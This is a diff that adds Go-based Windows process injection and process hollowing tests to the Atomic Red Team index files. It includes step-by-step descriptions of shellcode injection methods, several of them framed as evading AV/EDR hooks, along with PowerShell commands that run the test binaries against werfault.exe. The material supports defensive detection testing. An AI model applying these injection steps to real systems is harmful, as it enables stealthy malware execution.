@@ -1172,6 +1194,7 @@
   - Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique [windows]
   - Atomic Test #3: WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique [windows]
   - Atomic Test #4: WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique [windows]
+  - Atomic Test #5: Run Shellcode via Syscall in Go [windows]
 - T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1610 Deploy a container](../../T1610/T1610.md)
   - Atomic Test #1: Deploy Docker container [containers]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index df117132..3110976d 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -134,6 +134,13 @@
   - Atomic Test #3: Section View Injection [windows]
   - Atomic Test #4: Dirty Vanity process Injection [windows]
   - Atomic Test #5: Read-Write-Execute process Injection [windows]
+  - Atomic Test #6: Process Injection with Go using UuidFromStringA WinAPI [windows]
+  - Atomic Test #7: Process Injection with Go using EtwpCreateEtwThread WinAPI [windows]
+  - Atomic Test #8: Remote Process Injection with Go using RtlCreateUserThread WinAPI [windows]
+  - Atomic Test #9: Remote Process Injection with Go using CreateRemoteThread WinAPI [windows]
+  - Atomic Test #10: Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively) [windows]
+  - Atomic Test #11: Process Injection with Go using CreateThread WinAPI [windows]
+  - Atomic Test #12: Process Injection with Go using CreateThread WinAPI (Natively) [windows]
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218 Signed Binary Proxy Execution](../../T1218/T1218.md)
   - Atomic Test #1: mavinject - Inject DLL into running process [windows]
@@ -292,6 +299,8 @@
   - Atomic Test #2: Creating W32Time similar named service using sc [windows]
 - [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
   - Atomic Test #1: Process Injection via C# [windows]
+  - Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
+  - Atomic Test #3: Remote Process Injection with Go using NtQueueApcThreadEx WinAPI [windows]
 - [T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
   - Atomic Test #1: Mount ISO image [windows]
   - Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
@@ -389,6 +398,8 @@
 - [T1055.012 Process Injection: Process Hollowing](../../T1055.012/T1055.012.md)
   - Atomic Test #1: Process Hollowing using PowerShell [windows]
   - Atomic Test #2: RunPE via VBA [windows]
+  - Atomic Test #3: Process Hollowing in Go using CreateProcessW WinAPI [windows]
+  - Atomic Test #4: Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012) [windows]
 - [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
   - Atomic Test #2: Execute base64-encoded PowerShell [windows]
   - Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry [windows]
@@ -601,6 +612,13 @@
   - Atomic Test #3: Section View Injection [windows]
   - Atomic Test #4: Dirty Vanity process Injection [windows]
   - Atomic Test #5: Read-Write-Execute process Injection [windows]
+  - Atomic Test #6: Process Injection with Go using UuidFromStringA WinAPI [windows]
+  - Atomic Test #7: Process Injection with Go using EtwpCreateEtwThread WinAPI [windows]
+  - Atomic Test #8: Remote Process Injection with Go using RtlCreateUserThread WinAPI [windows]
+  - Atomic Test #9: Remote Process Injection with Go using CreateRemoteThread WinAPI [windows]
+  - Atomic Test #10: Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively) [windows]
+  - Atomic Test #11: Process Injection with Go using CreateThread WinAPI [windows]
+  - Atomic Test #12: Process Injection with Go using CreateThread WinAPI (Natively) [windows]
 - T1611 Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1547.009 Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md)
   - Atomic Test #1: Shortcut Modification [windows]
@@ -641,6 +659,8 @@
   - Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
 - [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
   - Atomic Test #1: Process Injection via C# [windows]
+  - Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
+  - Atomic Test #3: Remote Process Injection with Go using NtQueueApcThreadEx WinAPI [windows]
 - [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md)
   - Atomic Test #1: Create registry persistence via AppCert DLL [windows]
 - T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -700,6 +720,8 @@
 - [T1055.012 Process Injection: Process Hollowing](../../T1055.012/T1055.012.md)
   - Atomic Test #1: Process Hollowing using PowerShell [windows]
   - Atomic Test #2: RunPE via VBA [windows]
+  - Atomic Test #3: Process Hollowing in Go using CreateProcessW WinAPI [windows]
+  - Atomic Test #4: Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012) [windows]
 - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546 Event Triggered Execution](../../T1546/T1546.md)
   - Atomic Test #1: Persistence with Custom AutodialDLL [windows]
@@ -803,6 +825,7 @@
   - Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique [windows]
   - Atomic Test #3: WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique [windows]
   - Atomic Test #4: WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique [windows]
+  - Atomic Test #5: Run Shellcode via Syscall in Go [windows]
 - T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1072 Software Deployment Tools](../../T1072/T1072.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index bb0d24da..c81bc634 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -8454,6 +8454,192 @@ defense-evasion:
           Stop-Process -Force
         name: powershell
         elevation_required: true
+    - name: Process Injection with Go using UuidFromStringA WinAPI
+      auto_generated_guid: 2315ce15-38b6-46ac-a3eb-5e21abef2545
+      description: "Uses WinAPI UuidFromStringA to load shellcode to a memory address
+        then executes the shellcode using EnumSystemLocalesA.\nWith this technique,
+        memory is allocated on the heap and does not use commonly suspicious APIs
+        such as VirtualAlloc, WriteProcessMemory, or CreateThread \n- PoC Credit:
+        (https://github.com/Ne0nd0g/go-shellcode/tree/master#uuidfromstringa)\n- References:
+        \n  - https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/\n
+        \ - https://twitter.com/_CPResearch_/status/1352310521752662018\n  - https://blog.securehat.co.uk/process-injection/shellcode-execution-via-enumsystemlocala\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\UuidFromStringA.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Process Injection with Go using EtwpCreateEtwThread WinAPI
+      auto_generated_guid: 7362ecef-6461-402e-8716-7410e1566400
+      description: "Uses EtwpCreateEtwThread function from ntdll.dll to execute shellcode
+        within the application's process.\nThis program loads the DLLs and gets a
+        handle to the used procedures itself instead of using the windows package
+        directly.\n\nSteps taken with this technique\n1. Allocate memory for the shellcode
+        with VirtualAlloc setting the page permissions to Read/Write\n2. Use the RtlCopyMemory
+        macro to copy the shellcode to the allocated memory space\n3. Change the memory
+        page permissions to Execute/Read with VirtualProtect\n4. Call EtwpCreateEtwThread
+        on shellcode address\n5. Call WaitForSingleObject so the program does not
+        end before the shellcode is executed\n\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#EtwpCreateEtwThread)\n-
+        References: \n  - https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3\n
+        \ - https://www.geoffchappell.com/studies/windows/win32/ntdll/api/etw/index.htm\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\EtwpCreateEtwThread.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Remote Process Injection with Go using RtlCreateUserThread WinAPI
+      auto_generated_guid: a0c1725f-abcd-40d6-baac-020f3cf94ecd
+      description: "Executes shellcode in a remote process.\n\nSteps taken with this
+        technique\n1. Get a handle to the target process\n2. Allocate memory for the
+        shellcode with VirtualAllocEx setting the page permissions to Read/Write\n3.
+        Use the WriteProcessMemory to copy the shellcode to the allocated memory space
+        in the remote process\n4. Change the memory page permissions to Execute/Read
+        with VirtualProtectEx\n5. Execute the entrypoint of the shellcode in the remote
+        process with RtlCreateUserThread\n6. Close the handle to the remote process\n\n-
+        PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)\n-
+        References: \n  - https://www.cobaltstrike.com/blog/cobalt-strikes-process-injection-the-details-cobalt-strike\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\RtlCreateUserThread.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using CreateRemoteThread WinAPI
+      auto_generated_guid: 69534efc-d5f5-4550-89e6-12c6457b9edd
+      description: |
+        Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellocde in a remote process.
+
+        This application leverages functions from the golang.org/x/sys/windows package, where feasible, like the windows.OpenProcess().
+
+        Steps taken with this technique
+        1. Get a handle to the target process
+        2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
+        3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
+        4. Change the memory page permissions to Execute/Read with VirtualProtectEx
+        5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
+        6. Close the handle to the remote process
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethread)
+         - References:
+          - https://www.ired.team/offensive-security/code-injection-process-injection/process-injection
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThread.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)
+      auto_generated_guid: 2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39
+      description: |
+        Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellcode in a remote process.
+
+        This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
+
+        1. Get a handle to the target process
+        2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
+        3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
+        4. Change the memory page permissions to Execute/Read with VirtualProtectEx
+        5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
+        6. Close the handle to the remote process
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethreadnative)
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThreadNative.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Process Injection with Go using CreateThread WinAPI
+      auto_generated_guid: 2871ed59-3837-4a52-9107-99500ebc87cb
+      description: |
+        This program executes shellcode in the current process using the following steps
+        1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+        2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+        3. Change the memory page permissions to Execute/Read with VirtualProtect
+        4. Call CreateThread on shellcode address
+        5. Call WaitForSingleObject so the program does not end before the shellcode is executed
+
+        This program leverages the functions from golang.org/x/sys/windows to call Windows procedures instead of manually loading them
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthread)
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThread.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Process Injection with Go using CreateThread WinAPI (Natively)
+      auto_generated_guid: 2a3c7035-d14f-467a-af94-933e49fe6786
+      description: |
+        This program executes shellcode in the current process using the following steps
+        1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+        2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+        3. Change the memory page permissions to Execute/Read with VirtualProtect
+        4. Call CreateThread on shellcode address
+        5. Call WaitForSingleObject so the program does not end before the shellcode is executed
+
+        This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthreadnative)
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThreadNative.exe -debug\n"
+        cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
   T1205:
     technique:
       modified: '2022-10-19T23:08:40.603Z'
@@ -15708,6 +15894,60 @@ defense-evasion:
 
           '
         name: command_prompt
+    - name: EarlyBird APC Queue Injection in Go
+      auto_generated_guid: 73785dd2-323b-4205-ab16-bb6f06677e14
+      description: "Creates a process in a suspended state and calls QueueUserAPC
+        WinAPI to add a UserAPC to the child process that points to allocated shellcode.
+        \nResumeThread is called which then calls NtTestAlert to execute the created
+        UserAPC which then executes the shellcode.\nThis technique allows for the
+        early execution of shellcode and potentially before AV/EDR can hook functions
+        to support detection.\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)\n-
+        References: \n  - https://www.bleepingcomputer.com/news/security/early-bird-code-injection-technique-helps-malware-stay-undetected/\n
+        \ - https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process to spawn
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.004\bin\x64\EarlyBird.exe -program "#{spawn_process_path}"
+          -debug
+
+          '
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{spawn_process_name}" -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using NtQueueApcThreadEx WinAPI
+      auto_generated_guid: 4cc571b1-f450-414a-850f-879baf36aa06
+      description: "Uses the undocumented NtQueueAPCThreadEx WinAPI to create a \"Special
+        User APC\" in the current thread of the current process to execute shellcode.
+        \nSince the shellcode is loaded and executed in the current process it is
+        considered local shellcode execution.\n\nSteps taken with this technique\n1.
+        Allocate memory for the shellcode with VirtualAlloc setting the page permissions
+        to Read/Write\n2. Use the RtlCopyMemory macro to copy the shellcode to the
+        allocated memory space\n3. Change the memory page permissions to Execute/Read
+        with VirtualProtect\n4. Get a handle to the current thread\n5. Execute the
+        shellcode in the current thread by creating a Special User APC through the
+        NtQueueApcThreadEx function\n\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)\n-
+        References:\n  - https://repnz.github.io/posts/apc/user-apc/\n  - https://docs.rs/ntapi/0.3.1/ntapi/ntpsapi/fn.NtQueueApcThreadEx.html\n
+        \ - https://0x00sec.org/t/process-injection-apc-injection/24608\n  - https://twitter.com/aionescu/status/992264290924032005\n
+        \ - http://www.opening-windows.com/techart_windows_vista_apc_internals2.htm#_Toc229652505\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055.004\\bin\\x64\\NtQueueApcThreadEx.exe
+          -debug\n"
+        cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
   T1647:
     technique:
       x_mitre_platforms:
@@ -20685,6 +20925,60 @@ defense-evasion:
           -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
           -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
         name: powershell
+    - name: Process Hollowing in Go using CreateProcessW WinAPI
+      auto_generated_guid: c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a
+      description: |
+        Creates a process in a suspended state, executes shellcode to spawn calc.exe in a child process, and then resumes the original process.
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocess)
+      supported_platforms:
+      - windows
+      input_arguments:
+        hollow_binary_path:
+          description: Path of the binary to hollow
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        hollow_process_name:
+          description: Name of the process to hollow
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcess.exe -program
+          "#{hollow_binary_path}" -debug
+
+          '
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
+    - name: Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)
+      auto_generated_guid: 94903cc5-d462-498a-b919-b1e5ab155fee
+      description: |
+        Create a process in a suspended state, execute shellcode to spawn calc.exe in a child process, and then resume the original process.
+        This test uses the CreatePipe function to create an anonymous pipe that parent and child processes can communicate over. This anonymous pipe
+        allows for the retrieval of output generated from executed shellcode.
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)
+      supported_platforms:
+      - windows
+      input_arguments:
+        hollow_binary_path:
+          description: Path of the binary to hollow
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        hollow_process_name:
+          description: Name of the process to hollow
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcessWithPipe.exe
+          -program "#{hollow_binary_path}" -debug
+
+          '
+        cleanup_command: |-
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
   T1564.009:
     technique:
       x_mitre_platforms:
@@ -34115,6 +34409,192 @@ privilege-escalation:
           Stop-Process -Force
         name: powershell
         elevation_required: true
+    - name: Process Injection with Go using UuidFromStringA WinAPI
+      auto_generated_guid: 2315ce15-38b6-46ac-a3eb-5e21abef2545
+      description: "Uses WinAPI UuidFromStringA to load shellcode to a memory address
+        then executes the shellcode using EnumSystemLocalesA.\nWith this technique,
+        memory is allocated on the heap and does not use commonly suspicious APIs
+        such as VirtualAlloc, WriteProcessMemory, or CreateThread \n- PoC Credit:
+        (https://github.com/Ne0nd0g/go-shellcode/tree/master#uuidfromstringa)\n- References:
+        \n  - https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/\n
+        \ - https://twitter.com/_CPResearch_/status/1352310521752662018\n  - https://blog.securehat.co.uk/process-injection/shellcode-execution-via-enumsystemlocala\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\UuidFromStringA.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Process Injection with Go using EtwpCreateEtwThread WinAPI
+      auto_generated_guid: 7362ecef-6461-402e-8716-7410e1566400
+      description: "Uses EtwpCreateEtwThread function from ntdll.dll to execute shellcode
+        within the application's process.\nThis program loads the DLLs and gets a
+        handle to the used procedures itself instead of using the windows package
+        directly.\n\nSteps taken with this technique\n1. Allocate memory for the shellcode
+        with VirtualAlloc setting the page permissions to Read/Write\n2. Use the RtlCopyMemory
+        macro to copy the shellcode to the allocated memory space\n3. Change the memory
+        page permissions to Execute/Read with VirtualProtect\n4. Call EtwpCreateEtwThread
+        on shellcode address\n5. Call WaitForSingleObject so the program does not
+        end before the shellcode is executed\n\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#EtwpCreateEtwThread)\n-
+        References: \n  - https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3\n
+        \ - https://www.geoffchappell.com/studies/windows/win32/ntdll/api/etw/index.htm\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\EtwpCreateEtwThread.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Remote Process Injection with Go using RtlCreateUserThread WinAPI
+      auto_generated_guid: a0c1725f-abcd-40d6-baac-020f3cf94ecd
+      description: "Executes shellcode in a remote process.\n\nSteps taken with this
+        technique\n1. Get a handle to the target process\n2. Allocate memory for the
+        shellcode with VirtualAllocEx setting the page permissions to Read/Write\n3.
+        Use the WriteProcessMemory to copy the shellcode to the allocated memory space
+        in the remote process\n4. Change the memory page permissions to Execute/Read
+        with VirtualProtectEx\n5. Execute the entrypoint of the shellcode in the remote
+        process with RtlCreateUserThread\n6. Close the handle to the remote process\n\n-
+        PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)\n-
+        References: \n  - https://www.cobaltstrike.com/blog/cobalt-strikes-process-injection-the-details-cobalt-strike\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\RtlCreateUserThread.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using CreateRemoteThread WinAPI
+      auto_generated_guid: 69534efc-d5f5-4550-89e6-12c6457b9edd
+      description: |
+        Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellocde in a remote process.
+
+        This application leverages functions from the golang.org/x/sys/windows package, where feasible, like the windows.OpenProcess().
+
+        Steps taken with this technique
+        1. Get a handle to the target process
+        2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
+        3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
+        4. Change the memory page permissions to Execute/Read with VirtualProtectEx
+        5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
+        6. Close the handle to the remote process
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethread)
+         - References:
+          - https://www.ired.team/offensive-security/code-injection-process-injection/process-injection
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThread.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)
+      auto_generated_guid: 2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39
+      description: |
+        Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellcode in a remote process.
+
+        This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
+
+        1. Get a handle to the target process
+        2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
+        3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
+        4. Change the memory page permissions to Execute/Read with VirtualProtectEx
+        5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
+        6. Close the handle to the remote process
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethreadnative)
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThreadNative.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Process Injection with Go using CreateThread WinAPI
+      auto_generated_guid: 2871ed59-3837-4a52-9107-99500ebc87cb
+      description: |
+        This program executes shellcode in the current process using the following steps
+        1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+        2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+        3. Change the memory page permissions to Execute/Read with VirtualProtect
+        4. Call CreateThread on shellcode address
+        5. Call WaitForSingleObject so the program does not end before the shellcode is executed
+
+        This program leverages the functions from golang.org/x/sys/windows to call Windows procedures instead of manually loading them
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthread)
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThread.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Process Injection with Go using CreateThread WinAPI (Natively)
+      auto_generated_guid: 2a3c7035-d14f-467a-af94-933e49fe6786
+      description: |
+        This program executes shellcode in the current process using the following steps
+        1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+        2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+        3. Change the memory page permissions to Execute/Read with VirtualProtect
+        4. Call CreateThread on shellcode address
+        5. Call WaitForSingleObject so the program does not end before the shellcode is executed
+
+        This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthreadnative)
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThreadNative.exe -debug\n"
+        cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
   T1611:
     technique:
       modified: '2023-04-15T16:21:04.265Z'
@@ -37099,6 +37579,60 @@ privilege-escalation:
 
           '
         name: command_prompt
+    - name: EarlyBird APC Queue Injection in Go
+      auto_generated_guid: 73785dd2-323b-4205-ab16-bb6f06677e14
+      description: "Creates a process in a suspended state and calls QueueUserAPC
+        WinAPI to add a UserAPC to the child process that points to allocated shellcode.
+        \nResumeThread is called which then calls NtTestAlert to execute the created
+        UserAPC which then executes the shellcode.\nThis technique allows for the
+        early execution of shellcode and potentially before AV/EDR can hook functions
+        to support detection.\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)\n-
+        References: \n  - https://www.bleepingcomputer.com/news/security/early-bird-code-injection-technique-helps-malware-stay-undetected/\n
+        \ - https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process to spawn
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.004\bin\x64\EarlyBird.exe -program "#{spawn_process_path}"
+          -debug
+
+          '
+        cleanup_command: |
